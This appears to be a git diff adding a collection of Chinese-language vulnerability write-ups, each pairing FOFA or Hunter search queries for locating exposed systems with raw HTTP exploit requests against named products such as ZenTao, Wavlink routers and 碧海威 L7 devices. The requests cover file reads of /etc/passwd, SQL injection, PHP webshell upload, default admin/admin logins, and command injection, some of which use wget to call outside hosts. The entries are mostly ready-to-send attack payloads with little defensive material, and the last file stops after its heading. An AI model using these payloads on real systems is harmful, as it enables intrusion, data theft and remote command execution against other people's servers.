+![1731491896473-24d5cb3b-d315-42f2-9ec1-1f134e61a755.png](./img/dpPBebsZuuMRaArk/1731491896473-24d5cb3b-d315-42f2-9ec1-1f134e61a755-241134.png)
+
+# 四、漏洞复现
+先注册一个账号
+
+```plain
+/index/user/register.html
+```
+
+![1731491909841-961c0fff-99f9-4dbf-98ac-12b86fdd1ca5.png](./img/dpPBebsZuuMRaArk/1731491909841-961c0fff-99f9-4dbf-98ac-12b86fdd1ca5-628641.png)
+
+```plain
+GET /api/user/http_request?url=file:///etc/passwd HTTP/2.0
+Host: 
+upgrade-insecure-requests: 1
+user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+cookie: PHPSESSID=6e6b24gm79uba18etg6j1cj3a5
+cookie: think_var=zh-cn
+cookie: uid=22
+cookie: token=44ee3c7f-0b30-4e2d-9357-4442231c49b0
+```
+
+![1731491856618-2fb8c5e0-7d17-4677-bc31-70b72099de96.png](./img/dpPBebsZuuMRaArk/1731491856618-2fb8c5e0-7d17-4677-bc31-70b72099de96-714752.png)
+
+
+
+> 更新: 2024-11-27 10:00:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/omoxpfzm1rmvt1du>
\ No newline at end of file
diff --git a/真内控国产化平台preview存在任意文件读取漏洞.md b/真内控国产化平台preview存在任意文件读取漏洞.md
new file mode 100644
index 0000000..2b0c228
--- /dev/null
+++ b/真内控国产化平台preview存在任意文件读取漏洞.md
@@ -0,0 +1,28 @@
+# 真内控国产化平台preview存在任意文件读取漏洞
+
+# 一、漏洞简介
+真内控国产化平台是基于国产可控技术开发的内部控制管理咨询及信息化服务平台。该平台涵盖了预算绩效、支出管理、采购管理、合同管理、资产管理、基建项目管理等多个模块，为公共部门（包括政府部门、科研机构、学校、医院等）提供全方位的经济活动内部控制解决方案。真内控国产化平台 preview接口存在一个任意文件读取漏洞，攻击者可以通过构造精心设计的请求，成功利用漏洞读取服务器上的任意文件，包括敏感系统文件和应用程序配置文件等。通过利用此漏洞，攻击者可能获得系统内的敏感信息，导致潜在的信息泄露风险。
+
+# 二、影响版本
+真内控国产化平台
+
+# 三、资产测绘
+```plain
+body="js/npm.echarts.js"
+```
+
+![1718991802147-8b55da97-545e-456a-b18e-fa349435c2ae.png](./img/PUn3lRwoNJ9lQ-zV/1718991802147-8b55da97-545e-456a-b18e-fa349435c2ae-033492.png)
+
+# 四、漏洞复现
+```java
+GET /print/billPdf/preview?urlPath=../../../../../../../../../../../../../../etc/passwd  HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+```
+
+![1718991623666-59807fc9-1c16-4ff4-bb86-305f12a4f0b5.png](./img/PUn3lRwoNJ9lQ-zV/1718991623666-59807fc9-1c16-4ff4-bb86-305f12a4f0b5-514760.png)
+
+
+
+> 更新: 2024-06-23 23:42:48  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/um00s8xep779vpgx>
\ No newline at end of file
diff --git a/睿因-Wavlink-WL_WNJ575A3-远程命令执行.md b/睿因-Wavlink-WL_WNJ575A3-远程命令执行.md
new file mode 100644
index 0000000..b46c702
--- /dev/null
+++ b/睿因-Wavlink-WL_WNJ575A3-远程命令执行.md
@@ -0,0 +1,33 @@
+## 睿因 Wavlink WL_WNJ575A3 远程命令执行
+影响版本
+
+Wavlink WL_WNJ575A3 v.R75A3_V1410_220513
+
+漏洞代码
+
+POC
+```
+POST /cgi-bin/adm.cgi HTTP/1.1
+Host: 192.168.10.1
+Content-Length: 91
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.10.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
+Chrome/100.0.4896.60 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
+q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.10.1/set_time.shtml?r=29725
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: session=1243623152
+Connection: close
+
+page=sysAdm&SYSPASS=password&username='`ls>/etc_ro/lighttpd/www/data.html`'&newpass= 12345678
+
+
+```
+1.Burp 发包执行命令
+2.访问“data.html”查看命令执行结
diff --git a/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞 2.md b/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..432d3f6
--- /dev/null
+++ b/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞 2.md	
@@ -0,0 +1,26 @@
+# 知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞
+
+知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞，位于 /Application/App/Controller/ZmController.class.php 控制器中的leibiao方法直接POST传入tid参数，然后直接带到sql查询中，导致漏洞产生。
+
+fofa
+
+```javascript
+"域名/skdjfdf"
+```
+
+## poc
+
+```javascript
+POST /app/zm/leibiao HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Cookie: PHPSESSID=q7pp0d3p3f5ileeqhnf8v5lnt1
+Connection: close
+Content-Length: 55
+
+tid=(CASE WHEN (3711=3711) THEN SLEEP(5) ELSE 3711 END)
+```
+
+![c469f37e9896e4ad478f4d75eadc4196](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181628116.jpg)
\ No newline at end of file
diff --git a/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞.md b/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞.md
new file mode 100644
index 0000000..9c01492
--- /dev/null
+++ b/知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞.md
@@ -0,0 +1,35 @@
+# 知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.84);">知识吾爱纯净版小程序系统是一款基于 微信小程序平台开发的知识付费应用，旨在帮助用户快速建立自己的知识付费平台，实现支付变现和流量主收益。它提供了简洁明了的用户界面和良好的用户体验，同时注重用户隐私保护，确保用户信息的安全存储和传输。知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞</font>
+
+# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>
++ 知识吾爱纯净版小程序系统
+
+# 三、资产测绘
+```plain
+body="域名/skdjfdf"
+```
+
+![1730458370615-6af13af3-b0ea-4efb-8893-a60e7a5b115d.png](./img/6k5iZDzwJDll-eGM/1730458370615-6af13af3-b0ea-4efb-8893-a60e7a5b115d-319172.png)
+
+![1730458386388-e28bc009-06d0-4fd2-b287-33c2e81c7310.png](./img/6k5iZDzwJDll-eGM/1730458386388-e28bc009-06d0-4fd2-b287-33c2e81c7310-108578.png)
+
+# 四、漏洞复现
+```plain
+POST /app/zm/leibiao HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Connection: close
+ 
+tid=(CASE WHEN (3711=3711) THEN SLEEP(5) ELSE 3711 END)
+```
+
+![1730458437073-fbd1aa3f-fcf5-4ab3-95a1-928e9f5975cc.png](./img/6k5iZDzwJDll-eGM/1730458437073-fbd1aa3f-fcf5-4ab3-95a1-928e9f5975cc-934639.png)
+
+
+
+> 更新: 2024-11-27 10:00:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/eqt5cie65az0nwn5>
\ No newline at end of file
diff --git a/短剧影视小程序前台base64_image_content任意文件上传漏洞.md b/短剧影视小程序前台base64_image_content任意文件上传漏洞.md
new file mode 100644
index 0000000..f8b28c9
--- /dev/null
+++ b/短剧影视小程序前台base64_image_content任意文件上传漏洞.md
@@ -0,0 +1,36 @@
+# 短剧影视小程序前台base64_image_content任意文件上传漏洞
+
+**注意 这里需要登录，普通用户权限即可 访问 /index/user 可直接注册登录。**
+
+## fofa
+
+```yaml
+"/VwmRIfEYDH.php"
+```
+
+## poc
+
+```javascript
+POST /api/user/avatar HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0
+Connection: keep-alive
+Content-Length: 73Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=qt0rrvopobbbvibu6f8p9lr42
+rHost: 127.0.0.1
+Origin: http://127.0.0.1
+Referer: http://127.0.0.1/api/user/avatar
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+
+base64=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==
+```
+
+![image-20240902102758828](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021027916.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/3WYJzQnjl8hP7oXVZUEQuA
\ No newline at end of file
diff --git a/短剧影视小程序前台juhecurl任意文件读取漏洞.md b/短剧影视小程序前台juhecurl任意文件读取漏洞.md
new file mode 100644
index 0000000..67af33a
--- /dev/null
+++ b/短剧影视小程序前台juhecurl任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 短剧影视小程序前台juhecurl任意文件读取漏洞
+
+
+
+## fofa
+
+```yaml
+"/VwmRIfEYDH.php"
+```
+
+## poc
+
+```javascript
+GET /api/ems/juhecurl?url=file:///etc/passwd HTTP/1.1
+Host: 127.0.0.1
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20240902102433044](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021024146.png)
+
+![image-20240902102440030](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021024087.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/3WYJzQnjl8hP7oXVZUEQuA
\ No newline at end of file
diff --git a/短剧影视小程序前台未授权漏洞.md b/短剧影视小程序前台未授权漏洞.md
new file mode 100644
index 0000000..99fead5
--- /dev/null
+++ b/短剧影视小程序前台未授权漏洞.md
@@ -0,0 +1,26 @@
+# 短剧影视小程序前台未授权漏洞
+
+**在 /api/controller/Index.php 控制器的index方法中，很明显地存在 where 查询网站信息及User表中的字段，并且将所有用户枚举出来，且因为 $noNeedLogin = ['*'] 导致所有接口都无权限验证.**
+
+## fofa
+
+```yaml
+"/VwmRIfEYDH.php"
+```
+
+## poc
+
+```javascript
+POST /api/index HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+
+```
+
+![image-20240902103321159](C:/Users/26927/AppData/Roaming/Typora/typora-user-images/image-20240902103321159.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/3WYJzQnjl8hP7oXVZUEQuA
\ No newline at end of file
diff --git a/短视频系统视频知识付费系统存在任意文件读取漏洞.md b/短视频系统视频知识付费系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..c6e04c4
--- /dev/null
+++ b/短视频系统视频知识付费系统存在任意文件读取漏洞.md
@@ -0,0 +1,32 @@
+# 短视频系统视频知识付费系统存在任意文件读取漏洞
+
+# 一、漏洞简介
+短视频系统视频知识付费系统是FastAdmin框架短视频系统/视频知识付费源码/附带小说系统，系统视频支持包月、单独购买、观影卷等功能。短视频系统视频知识付费系统存在任意文件读取漏洞
+
+# 二、影响版本
++ <font style="color:rgb(51, 51, 51);">短视频系统视频知识付费系统</font>
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ fofa`"testvideo://login?id="`
++ 特征
+
+![1732590500428-b97fa7a7-1614-41b1-bbe8-c54cb6182208.png](./img/1DDZ9fZyRHdnns0P/1732590500428-b97fa7a7-1614-41b1-bbe8-c54cb6182208-475278.png)
+
+# 四、漏洞复现
+```plain
+GET /index/index/request_by_curl?remote_server=file:///etc/passwd&post_string=1 HTTP/1.1
+Host:
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![1732590542557-0279172f-b4e1-423f-9093-909316a7e452.png](./img/1DDZ9fZyRHdnns0P/1732590542557-0279172f-b4e1-423f-9093-909316a7e452-044964.png)
+
+
+
+> 更新: 2024-11-27 10:00:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rwak2pbxsqgk7mau>
\ No newline at end of file
diff --git a/碧海威L7多款产品confirm存在命令执行漏洞.md b/碧海威L7多款产品confirm存在命令执行漏洞.md
new file mode 100644
index 0000000..27ac550
--- /dev/null
+++ b/碧海威L7多款产品confirm存在命令执行漏洞.md
@@ -0,0 +1,58 @@
+# 碧海威 L7多款产品confirm存在命令执行漏洞
+
+# 一、漏洞简介
+碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品confirm存在命令执行漏洞
+
+# 二、影响版本
++ 碧海威 L7云路由
+
+# 三、资产测绘
+```plain
+product="碧海威科技-L7云路由"
+```
+
+![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/mHd0RhkHaJqo_UPI/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-319239.png)
+
+# 四、漏洞复现
+```plain
+GET /notice/confirm.php?t=;sleep%203 HTTP/1.1
+Host: 
+Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1717873640214-f81c5977-3acf-4091-84f5-157642413565.png](./img/mHd0RhkHaJqo_UPI/1717873640214-f81c5977-3acf-4091-84f5-157642413565-272740.png)
+
+```plain
+GET /notice/jumper.php?t=;wget%20tadayzkvfq.dgrh3.cn HTTP/1.1
+Host: 
+Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1719303279808-613fbf12-e772-469f-9dfb-1bf1c3d53d44.png](./img/mHd0RhkHaJqo_UPI/1719303279808-613fbf12-e772-469f-9dfb-1bf1c3d53d44-161786.png)
+
+
+
+> 更新: 2024-06-27 09:15:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nsgae82bubkkmg4k>
\ No newline at end of file
diff --git a/碧海威L7多款产品index存在命令执行漏洞.md b/碧海威L7多款产品index存在命令执行漏洞.md
new file mode 100644
index 0000000..7a4610a
--- /dev/null
+++ b/碧海威L7多款产品index存在命令执行漏洞.md
@@ -0,0 +1,31 @@
+# 碧海威 L7多款产品index存在命令执行漏洞
+
+# 一、漏洞简介
+碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品index存在命令执行漏洞
+
+# 二、影响版本
++ 碧海威 L7云路由
+
+# 三、资产测绘
+```plain
+product="碧海威科技-L7云路由"
+```
+
+![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/5VV9Gb23QQkaNIBN/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-055453.png)
+
+# 四、漏洞复现
+```plain
+POST /portal/ibilling/index.php HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+
+{"type":5,"version":2,"bypass":";wget sadvlgapra.dgrh3.cn"}
+```
+
+![1717873439881-6561c715-975f-49c4-a47f-5a787180f384.png](./img/5VV9Gb23QQkaNIBN/1717873439881-6561c715-975f-49c4-a47f-5a787180f384-400658.png)
+
+
+
+> 更新: 2024-06-27 09:15:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ayahigrv4qhbtgph>
\ No newline at end of file
diff --git a/碧海威L7多款产品jumper存在命令执行漏洞.md b/碧海威L7多款产品jumper存在命令执行漏洞.md
new file mode 100644
index 0000000..4416e6c
--- /dev/null
+++ b/碧海威L7多款产品jumper存在命令执行漏洞.md
@@ -0,0 +1,39 @@
+# 碧海威 L7多款产品jumper存在命令执行漏洞
+
+# 一、漏洞简介
+碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品jumper存在命令执行漏洞
+
+# 二、影响版本
++ 碧海威 L7云路由
+
+# 三、资产测绘
+```plain
+product="碧海威科技-L7云路由"
+```
+
+![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/vNePAYlOhVA2Jyhf/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-444380.png)
+
+# 四、漏洞复现
+```plain
+GET /notice/jumper.php?t=;sleep%203 HTTP/1.1
+Host: 
+Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1717873704369-554c7e1b-fc19-438c-b0c1-8c9cff46c2a7.png](./img/vNePAYlOhVA2Jyhf/1717873704369-554c7e1b-fc19-438c-b0c1-8c9cff46c2a7-473227.png)
+
+
+
+> 更新: 2024-06-27 09:15:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pcxmpv0re7iyse3f>
\ No newline at end of file
diff --git a/碧海威L7多款产品存在后台命令执行漏洞.md b/碧海威L7多款产品存在后台命令执行漏洞.md
new file mode 100644
index 0000000..4704ba0
--- /dev/null
+++ b/碧海威L7多款产品存在后台命令执行漏洞.md
@@ -0,0 +1,35 @@
+# 碧海威 L7多款产品存在后台命令执行漏洞
+
+# 一、漏洞简介
+碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品存在后台命令执行漏洞
+
+# 二、影响版本
++ 碧海威 L7云路由
+
+# 三、资产测绘
+```plain
+product="碧海威科技-L7云路由"
+```
+
+![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/vvU9uRd8v176utG_/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-971649.png)
+
+# 四、漏洞复现
+使用弱口令登录后台
+
+```plain
+admin/admin
+admin/admin123
+```
+
+![1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a.png](./img/vvU9uRd8v176utG_/1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a-997411.png)
+
+```plain
+help & cat /etc/passwd 
+```
+
+![1717873247660-03aaa28f-7534-404a-9426-de729a732f3e.png](./img/vvU9uRd8v176utG_/1717873247660-03aaa28f-7534-404a-9426-de729a732f3e-517323.png)
+
+
+
+> 更新: 2024-06-27 09:15:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tteea03oq5v1vp29>
\ No newline at end of file
diff --git a/碧海威L7多款产品存在弱口令漏洞.md b/碧海威L7多款产品存在弱口令漏洞.md
new file mode 100644
index 0000000..fee6c84
--- /dev/null
+++ b/碧海威L7多款产品存在弱口令漏洞.md
@@ -0,0 +1,27 @@
+# 碧海威 L7多款产品存在弱口令漏洞
+
+# 一、漏洞简介
+碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品存在弱口令漏洞
+
+# 二、影响版本
++ 碧海威 L7云路由
+
+# 三、资产测绘
+```plain
+product="碧海威科技-L7云路由"
+```
+
+![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/oQO3NqHUdc5J7H6A/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-933959.png)
+
+# 四、漏洞复现
+```plain
+admin/admin
+admin/admin123
+```
+
+![1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a.png](./img/oQO3NqHUdc5J7H6A/1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a-014169.png)
+
+
+
+> 更新: 2024-06-27 09:15:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ftuqkld0zg2ygzok>
\ No newline at end of file
diff --git a/神州数码DCN系统接口online_list.php存在任意文件读取漏洞.md b/神州数码DCN系统接口online_list.php存在任意文件读取漏洞.md
new file mode 100644
index 0000000..8d72dd4
--- /dev/null
+++ b/神州数码DCN系统接口online_list.php存在任意文件读取漏洞.md
@@ -0,0 +1,21 @@
+# 神州数码DCN系统接口online_list.php存在任意文件读取漏洞
+
+神州数码DCN系统接口online_list.php存在任意文件读取漏洞
+
+## fofa
+
+```javascript
+body="style/blue/css/dcn_ui.css"
+```
+
+## poc
+
+```javascript
+POST /function/auth/user/online_list.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+
+proxy_request=/etc/passwd
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412181058717.webp)
\ No newline at end of file
diff --git a/禅道-16.5-router.class.php-SQL注入漏洞.md b/禅道-16.5-router.class.php-SQL注入漏洞.md
new file mode 100644
index 0000000..738edf6
--- /dev/null
+++ b/禅道-16.5-router.class.php-SQL注入漏洞.md
@@ -0,0 +1,5 @@
+## 禅道 16.5 router.class.php SQL注入漏洞
+```
+POST /user-login.html 
+account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23
+```
diff --git a/禅道-v18.0-v18.3-存在后台命令执行漏洞.md b/禅道-v18.0-v18.3-存在后台命令执行漏洞.md
new file mode 100644
index 0000000..88205e0
--- /dev/null
+++ b/禅道-v18.0-v18.3-存在后台命令执行漏洞.md
@@ -0,0 +1,35 @@
+## 禅道 v18.0-v18.3 存在后台命令执行漏洞
+
+禅道后台存在 RCE 漏洞，存在于 V18.0-18.3 之间，经过复现分析，发现漏洞来源于新增加的一个功能模块。
+
+## fofa
+
+```
+app="易软天创-禅道系统"
+```
+
+## poc
+
+```
+POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:109.0)Gecko/20100101 Firefox/111.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/zentaopms/www/index.php?m=zahost&f=create
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 134
+Origin: http://xxx.xxx.xxx.xxx
+Connection: close
+Cookie: zentaosid=fwaf16g51w678678qw686;
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+vsoft=kvm&hostType=physical&name=penson&extranet=xxx.xxx.xxx.xxx%7Ccalc.exe&cpuCores=
+2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=z
+```
+
+![image-20240615214003637](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406152140793.png)
diff --git a/禅道16.5accountSQL注入漏洞.md b/禅道16.5accountSQL注入漏洞.md
new file mode 100644
index 0000000..59c227b
--- /dev/null
+++ b/禅道16.5accountSQL注入漏洞.md
@@ -0,0 +1,39 @@
+# 禅道 16.5 account SQL注入漏洞
+
+# 一、漏洞简介
+禅道由青岛易软天创网络科技有限公司开发，国产开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体，是一款专业的研发项目管理软件，完整覆盖了研发项目管理的核心流程。禅道 16.5 router.class.php 文件存在SQL注入漏洞，攻击者通过漏洞可以获取数据库敏感信息，危害服务器安全。
+
+# 二、影响版本
++ 禅道16.5
+
+# 三、资产测绘
++ hunter`app.name="ZenTao 禅道"`
++ 特征
+
+![1699714478551-516f3fa2-9e4b-4d88-9b29-fa34268af56c.png](./img/a7H1Slhd-hEcTkS9/1699714478551-516f3fa2-9e4b-4d88-9b29-fa34268af56c-608814.png)
+
+# 四、漏洞复现
+```plain
+POST /zentao/user-login.html HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 137
+Connection: close
+Cookie: zentaosid=83503a42384249100e644a077c476c0c; lang=zh-cn; device=desktop; theme=default; windowWidth=1512; windowHeight=763
+
+account=admin&password=91366fe23f8bf94e543b036e8fbcbc9c
+```
+
+sqlmap
+
+![1699714542899-4cb34bcb-cf2f-44a1-8647-959493ec72b4.png](./img/a7H1Slhd-hEcTkS9/1699714542899-4cb34bcb-cf2f-44a1-8647-959493ec72b4-906892.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kw41ggrplhegs76s>
\ No newline at end of file
diff --git a/禅道20.7后台任意文件读取漏洞.md b/禅道20.7后台任意文件读取漏洞.md
new file mode 100644
index 0000000..dd60071
--- /dev/null
+++ b/禅道20.7后台任意文件读取漏洞.md
@@ -0,0 +1,17 @@
+# 禅道20.7后台任意文件读取漏洞
+
+禅道20.7后台任意文件读取漏洞，只能读取网站目录下的文件
+
+## fofa
+
+```javascript
+app="易软天创-禅道系统"
+```
+
+## poc
+
+```javascript
+http://192.168.91.1:8017/index.php?m=editor&f=edit&filePath=Li4vLi4vY29uZmlnL215LnBocA==&action=extendOther&isExtends=3
+```
+
+![image-20241028155218530](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410281552692.png)
\ No newline at end of file
diff --git a/禅道21.1开源版存在SQL注入漏洞.md b/禅道21.1开源版存在SQL注入漏洞.md
new file mode 100644
index 0000000..6a4a6e7
--- /dev/null
+++ b/禅道21.1开源版存在SQL注入漏洞.md
@@ -0,0 +1,38 @@
+# 禅道21.1开源版存在SQL注入漏洞
+
